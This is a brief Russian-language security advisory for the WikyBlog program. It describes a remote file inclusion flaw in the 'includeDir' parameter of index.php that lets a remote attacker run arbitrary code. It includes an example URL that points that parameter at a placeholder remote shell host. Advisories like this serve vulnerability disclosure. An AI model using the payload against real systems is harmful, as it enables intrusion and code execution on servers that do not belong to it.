Программа: WikyBlog

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки проверки входных данных в параметере «includeDir” сценарием index.php.

Пример:

http://www.example.com/[scriptPath]/index.php?includeDir=http://SHELLURL.COM

Оставить мнение